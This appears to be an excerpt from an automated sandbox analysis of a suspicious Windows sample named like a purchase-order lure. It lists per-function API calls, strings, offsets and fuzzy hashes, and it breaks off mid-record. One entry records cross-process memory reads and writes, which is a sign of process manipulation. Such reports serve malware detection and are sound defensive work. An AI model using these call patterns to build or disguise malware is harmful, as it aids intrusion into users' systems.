                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 842720411-0
                                                            • Opcode ID: e2e13155928b440a6374b1a78b68bb68c2fbb3187d22858faee50deaa5f75e09
                                                            • Instruction ID: 2629b3b087bd0eeaa64da702ce845557073afa0a3593bab8bac230ef89700cdc
                                                            • Opcode Fuzzy Hash: e2e13155928b440a6374b1a78b68bb68c2fbb3187d22858faee50deaa5f75e09
                                                            • Instruction Fuzzy Hash: E1016970201244BFDB114FAAEC48DAB3BBCFF8A3547200829F905C3260DA759C40CBB0
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007F7A74
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007F7A82
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007F7A8A
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007F7A94
                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007F7AD0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 6e951797dc7b430913efc531719d963e1150a8f00821e9713d4fa693930d4cc8
                                                            • Instruction ID: 923054d153b058fa232762fe1fe412ea30f7b73151a655921cd0a8f1cc53a5a4
                                                            • Opcode Fuzzy Hash: 6e951797dc7b430913efc531719d963e1150a8f00821e9713d4fa693930d4cc8
                                                            • Instruction Fuzzy Hash: C6012D31C0462DDBCF04AFE8EC899EDBB78FB48711F024455E602B2250DB349650C7A1
                                                            APIs
                                                            • CLSIDFromProgID.OLE32 ref: 007E9ADC
                                                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 007E9AF7
                                                            • lstrcmpiW.KERNEL32(?,00000000), ref: 007E9B05
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 007E9B15
                                                            • CLSIDFromString.OLE32(?,?), ref: 007E9B21
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: b957bfadf0012f7abdfaea007065d89b35e877417489830936eb0496df07a0c4
                                                            • Instruction ID: eba47e785c49fa4176f76bfbbfe1304f7a835cbc169c4a32bfe778d3d3feb371
                                                            • Opcode Fuzzy Hash: b957bfadf0012f7abdfaea007065d89b35e877417489830936eb0496df07a0c4
                                                            • Instruction Fuzzy Hash: 86018FB6611204FFDB104F66EC44B9A7AEDEF88351F148C34FA05D2210D778DD009BA0
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007EAA79
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007EAA83
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007EAA92
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007EAA99
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007EAAAF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 2bdb9d97d63a980d344e8e63d908d5eed34277b2f31a4f7e413311b4a3002b53
                                                            • Instruction ID: f41677bd4d4dab008a84117e649255aff35b253d72057e5e8c528b2a85ca4302
                                                            • Opcode Fuzzy Hash: 2bdb9d97d63a980d344e8e63d908d5eed34277b2f31a4f7e413311b4a3002b53
                                                            • Instruction Fuzzy Hash: EBF04F712013047FEB115FA5AC89EAB7BACFF89754F004829F941C7190DA64EC51DA61
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007EAADA
                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007EAAE4
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007EAAF3
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007EAAFA
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007EAB10
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 6b2b4082199fe0170ef718f2bdc54cccd8b0aeec126f06c55a7c910c8d67acc8
                                                            • Instruction ID: c56a9ad9517f7ad1f50c8dabc51d051ea88ccc8c48429b86948bc4a1f337ccc7
                                                            • Opcode Fuzzy Hash: 6b2b4082199fe0170ef718f2bdc54cccd8b0aeec126f06c55a7c910c8d67acc8
                                                            • Instruction Fuzzy Hash: D8F04F712013087FEB111FA5FC88EAB3B6EFF99754F000829F941C7190DA64EC119A61
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 007EEC94
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 007EECAB
                                                            • MessageBeep.USER32(00000000), ref: 007EECC3
                                                            • KillTimer.USER32(?,0000040A), ref: 007EECDF
                                                            • EndDialog.USER32(?,00000001), ref: 007EECF9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 33fe2bddaa06c5fb8b3b015714936c200ee0762ede5691b9d9e8e616e14ea774
                                                            • Instruction ID: 33a918c6c710364d4c1048c0fc25d0f6f37cdced6b6f3213d9cfa68b74a0c849
                                                            • Opcode Fuzzy Hash: 33fe2bddaa06c5fb8b3b015714936c200ee0762ede5691b9d9e8e616e14ea774
                                                            • Instruction Fuzzy Hash: AF018130500744EBEB245B21EE5EB9677B8FB54705F100D59B693A14F0EBF8AA94CB90
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 007CB0BA
                                                            • StrokeAndFillPath.GDI32(?,?,0082E680,00000000,?,?,?), ref: 007CB0D6
                                                            • SelectObject.GDI32(?,00000000), ref: 007CB0E9
                                                            • DeleteObject.GDI32 ref: 007CB0FC
                                                            • StrokePath.GDI32(?), ref: 007CB117
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: d36855f93941eb12645a2a5bbe5557ac5ab0dc3fe5cafc4b21ace521ea626274
                                                            • Instruction ID: ce603fab6faac896372cb1fd29a829a1281d74cf2c373c00ff0c601d25f5e602
                                                            • Opcode Fuzzy Hash: d36855f93941eb12645a2a5bbe5557ac5ab0dc3fe5cafc4b21ace521ea626274
                                                            • Instruction Fuzzy Hash: F6F01430004608EFCF25AF69EC0EB983B64BB60762F088318F469894F4C734C9AADF50
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 007FF2DA
                                                            • CoCreateInstance.OLE32(0083DA7C,00000000,00000001,0083D8EC,?), ref: 007FF2F2
                                                            • CoUninitialize.OLE32 ref: 007FF555
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize
                                                            • String ID: .lnk
                                                            • API String ID: 948891078-24824748
                                                            • Opcode ID: 6bf5078b61e59ff57d9fe26392117a45639f78fee55158690fac5b5e1773103f
                                                            • Instruction ID: cdf5baed826f56b6ac851037882856b406c776d5e0bd38f3d8ad215221d6b9ef
                                                            • Opcode Fuzzy Hash: 6bf5078b61e59ff57d9fe26392117a45639f78fee55158690fac5b5e1773103f
                                                            • Instruction Fuzzy Hash: B1A13AB1104201AFD301EF64C885EAFB7E8EF98714F00495DF65597292EB74EA09CBA2
                                                            APIs
                                                              • Part of subcall function 007B660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B53B1,?,?,007B61FF,?,00000000,00000001,00000000), ref: 007B662F
                                                            • CoInitialize.OLE32(00000000), ref: 007FE85D
                                                            • CoCreateInstance.OLE32(0083DA7C,00000000,00000001,0083D8EC,?), ref: 007FE876
                                                            • CoUninitialize.OLE32 ref: 007FE893
                                                              • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                              • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                            • String ID: .lnk
                                                            • API String ID: 2126378814-24824748
                                                            • Opcode ID: ab5f8fb9ad3422b070d3ab6d9f4775710e29ae60c101918550de1570a472005f
                                                            • Instruction ID: 3432243e735cc4da795c582fa67433e258c7d7f78ee1dfeec0537d8369211a46
                                                            • Opcode Fuzzy Hash: ab5f8fb9ad3422b070d3ab6d9f4775710e29ae60c101918550de1570a472005f
                                                            • Instruction Fuzzy Hash: 3DA13575604305DFCB10DF14C888A6ABBE5FF88310F058958FAA69B3A1CB35EC45CB92
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 007D32ED
                                                              • Part of subcall function 007DE0D0: __87except.LIBCMT ref: 007DE10B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__87except__start
                                                            • String ID: pow
                                                            • API String ID: 2905807303-2276729525
                                                            • Opcode ID: 6122f985ada96c9e22a8031c7362f448e07624fd0b8a305670583248b996e136
                                                            • Instruction ID: e104a634e3b0f2285e6ceffe8f6ca6f34e90a61d32043d462ec459e001dbb651
                                                            • Opcode Fuzzy Hash: 6122f985ada96c9e22a8031c7362f448e07624fd0b8a305670583248b996e136
                                                            • Instruction Fuzzy Hash: AC515521A08205D6CB167714CA0577E7BB4BB41720F648D2BF4C58A3A9EE3D9EC4DA43
                                                            APIs
                                                            • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0084DC50,?,0000000F,0000000C,00000016,0084DC50,?), ref: 007F4645
                                                              • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                              • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                            • CharUpperBuffW.USER32(?,?,00000000,?), ref: 007F46C5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper$__itow__swprintf
                                                            • String ID: REMOVE$THIS
                                                            • API String ID: 3797816924-776492005
                                                            • Opcode ID: 5ac8902aa59ebe425837c549527d4f9a4d9ef4e5d27ce26ba41146c7f57b57ea
                                                            • Instruction ID: 2f9cb19f86e3ff60518304d96a3f3261e086be7a89cd01dce4ced16ef7a36812
                                                            • Opcode Fuzzy Hash: 5ac8902aa59ebe425837c549527d4f9a4d9ef4e5d27ce26ba41146c7f57b57ea
                                                            • Instruction Fuzzy Hash: B0414E74A00219DFCF01EF94C885ABEB7B5FF45314F148459EA16AB351D7389D45CB60
                                                            APIs
                                                              • Part of subcall function 007F430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007EBC08,?,?,00000034,00000800,?,00000034), ref: 007F4335
                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007EC1D3
                                                              • Part of subcall function 007F42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007EBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 007F4300
                                                              • Part of subcall function 007F422F: GetWindowThreadProcessId.USER32(?,?), ref: 007F425A
                                                              • Part of subcall function 007F422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007EBBCC,00000034,?,?,00001004,00000000,00000000), ref: 007F426A
                                                              • Part of subcall function 007F422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007EBBCC,00000034,?,?,00001004,00000000,00000000), ref: 007F4280
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007EC240
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007EC28D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @
                                                            • API String ID: 4150878124-2766056989
                                                            • Opcode ID: 4ab1b638e0e1423b1b9701392271a2fbfa52afc2f46e3849463806b3fc4b3cab
                                                            • Instruction ID: f60fca4fe817be51c6ce754badf08515c0f55f6538866f978a409978d54b0873
                                                            • Opcode Fuzzy Hash: 4ab1b638e0e1423b1b9701392271a2fbfa52afc2f46e3849463806b3fc4b3cab
                                                            • Instruction Fuzzy Hash: D4414B7690121CAFDB11DFA4CC86EEEB7B8BF09300F004095FA55B7281DA75AE45CBA1
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0084DC00,00000000,?,?,?,?), ref: 0081A6D8
                                                            • GetWindowLongW.USER32 ref: 0081A6F5
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0081A705
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: 9e2a3c9f0c7eab7bfa5388bdd81ff6d36df5d06e6e19a36276282404e0128153
                                                            • Instruction ID: a6356ae843f33170423a1f9e04f33872ea5af0f4a07355abed067d473465efe3
                                                            • Opcode Fuzzy Hash: 9e2a3c9f0c7eab7bfa5388bdd81ff6d36df5d06e6e19a36276282404e0128153
                                                            • Instruction Fuzzy Hash: 1E319C31201209ABDB258E78DC45BEA77ADFF59324F254719F8B9D22E0D734E9908B50
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0081A15E
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0081A172
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0081A196
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: f475c6106c1e6b1a2b6f7d50b446b0bc85a67a15905647d8d863dca0103b1409
                                                            • Instruction ID: 1ee54ebc9827bc5430948eca9667dcabc22709efa4acc7d3ded2dc7c94584b53
                                                            • Opcode Fuzzy Hash: f475c6106c1e6b1a2b6f7d50b446b0bc85a67a15905647d8d863dca0103b1409
                                                            • Instruction Fuzzy Hash: 8A217C32510218BBDF159EA4CC86FEA3B69FF48714F110214FA56AB190D6B5AC958BA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0081A941
                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0081A94F
                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0081A956
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$DestroyWindow
                                                            • String ID: msctls_updown32
                                                            • API String ID: 4014797782-2298589950
                                                            • Opcode ID: 1755223dd48651f1264d4f8b8f27d3be6067792228b0fb3b32e0bbf0f1cf8bbd
                                                            • Instruction ID: 175c76c2c9c1c9bc36ffeaca9504fcafdddc864aaaa18146f4e61815221abd58
                                                            • Opcode Fuzzy Hash: 1755223dd48651f1264d4f8b8f27d3be6067792228b0fb3b32e0bbf0f1cf8bbd
                                                            • Instruction Fuzzy Hash: 7E21AEB5200209AFDB14DF28DC86DA737ACFF6A3A4B050059FA15DB261DB31EC918B61
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00819A30
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00819A40
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00819A65
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
                                                            • Opcode ID: 9dfb42ba0220d29cd120cd6b7f98936f9f718fcbb86fb7ac4f4b7cbb12144aee
                                                            • Instruction ID: 38aa2eb6460acb13b242f65079064a7e2ffa5fdd7b8534fed5729c375002d539
                                                            • Opcode Fuzzy Hash: 9dfb42ba0220d29cd120cd6b7f98936f9f718fcbb86fb7ac4f4b7cbb12144aee
                                                            • Instruction Fuzzy Hash: 8221B072610118BFDF218F54DC95EFB3BAEFF89750F018128F9959B190C6719C9187A0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0081A46D
                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0081A482
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0081A48F
                                                            Strings
                                                            Memory Dump Source
